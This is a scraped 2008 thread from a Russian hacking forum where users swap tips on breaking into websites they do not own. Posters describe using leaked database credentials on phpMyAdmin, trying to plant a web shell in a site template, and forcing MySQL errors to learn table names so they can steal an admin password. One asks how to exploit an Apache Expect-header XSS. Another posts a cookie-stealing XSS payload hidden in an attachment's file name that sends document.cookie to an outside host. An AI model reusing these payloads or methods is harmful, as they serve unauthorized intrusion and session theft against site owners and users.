 |
|

02.05.2008, 21:12
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
Сообщение от Dronix
оО пездец полюбому черная магия, юзай читы
ты не понимаешь ничего.
предупреждения не воздействуют.
|
|
|

03.05.2008, 02:54
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Vid0k, поищи конфиги, мож там форум какой стоит или гест бук.
|
|
|

03.05.2008, 04:33
|
|
Постоянный
Регистрация: 24.12.2007
Сообщений: 574
С нами:
9674246
Репутация:
316
|
|
Vid0k, поищи конфиги, мож там форум какой стоит или гест бук.
уже нашел конфиги для db логин и пасс подошли к phpmyadmin
права там урезаны пытался залить шелл через вывод таблицы в файл не дали)
в админке сайта нету даже где залить файл попробую
отредактировать шабон index может пропишу простейший шел а там уже посмотрю
|
|
|

03.05.2008, 14:25
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами:
9584577
Репутация:
69
|
|
Подскажите, что можно сделать в случае если, база данных 4.1.22-standard, установлен форум, но стандартный префикс в таблицах по идее изменен. Каким образом тогда можно узнать названия этого самого префикса, чтобы получить пароль админа?
----------------------------------
брут не предлогать-помоему это не реально
|
|
|

03.05.2008, 14:32
|
|
Banned
Регистрация: 28.04.2008
Сообщений: 9
С нами:
9492866
Репутация:
3
|
|
Вызови какую-нить ошибку mysql, чтоб она выплюнула название таблицы
|
|
|
Unfiltered Header Injection in Apache |

05.05.2008, 10:18
|
|
Новичок
Регистрация: 25.11.2007
Сообщений: 9
С нами:
9716089
Репутация:
1
|
|
Unfiltered Header Injection in Apache
Всем привет , сканернул сайт и нашёл крит уязвимость
Unfiltered Header Injection in Apache
This version of Apache is vulnerable to HTML injection (including malicious Javascript code) through "Expect" header. Until not it was not classed as security vulnerability as an attacker has no way to influence the Expect header a victim will send to a target site. However, according to Amit Klein's paper: "Forging HTTP request headers with Flash" there is a working cross site scripting (XSS) attack against Apache 1.3.34, 2.0.57 and 2.2.1 (as long as the client browser is IE or Firefox, and it supports Flash 6/7+).
Нашёл описание тут http://www.securityfocus.com/archive/1/433280
но так и не понял как ей пользоватся так же скрипт показывает <script>alert(39582,41865125)</script>
: ( подскажите пожалуйста что и как ... ?
Последний раз редактировалось vampir3a; 05.05.2008 в 10:24..
|
|
|

05.05.2008, 16:51
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Всё прально, вместо цифр ставь текст : alert(/gagaga/) или alert(135)
Про XSS тут дофига статей, пофтыкай побольше.Если те нужен перевод, пиши на 292-514-125 : )
|
|
|

05.05.2008, 17:05
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Ой мля,ступил ппц.Это атака через хттр заголовок Expect.Для этого надо создать объект и послать,лично не пробывал:Р.Прост этот торч надеется на то, что через ие и файрфокс так сделать нельзя(и правильно делает),но через объекты мона.
|
|
|

05.05.2008, 17:42
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Велемир
Ой мля,ступил ппц.Это атака через хттр заголовок Expect.Для этого надо создать объект и послать,лично не пробывал:Р.Прост этот торч надеется на то, что через ие и файрфокс так сделать нельзя(и правильно делает),но через объекты мона.
Послушай, юноша, за каким хреном писать такой бред?
vampir3a
Вот немного об уязвимости на русском, но не особо обольщайся, сканер нашёл это не значит ,что получится использовать
_http://www.securitylab.ru/analytics/271169.php
|
|
|

05.05.2008, 19:48
|
|
Новичок
Регистрация: 28.04.2008
Сообщений: 5
С нами:
9492393
Репутация:
6
|
|
1.Есть форум, Powered by SMF 1.1.x,как узнать х?
2.Надеясь на удачу(что версия <=1.1.4), пробую приаттачить файл со следующим названием:
Код:
abc<img src= .width=1 height=1 onerror=javascriptnew Image().src='http//s.netsec.ru/arm.gif'+document.cookie>.txt
Но выдаётся ошибка:
Код:
default.htm.
Вы не можете отправить этот файл. Доступны только следующие типы файлов doc,gif,jpg,mpg,pdf,png,txt,zip.
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 14 (пользователей: 0 , гостей: 14)
|
|
|
|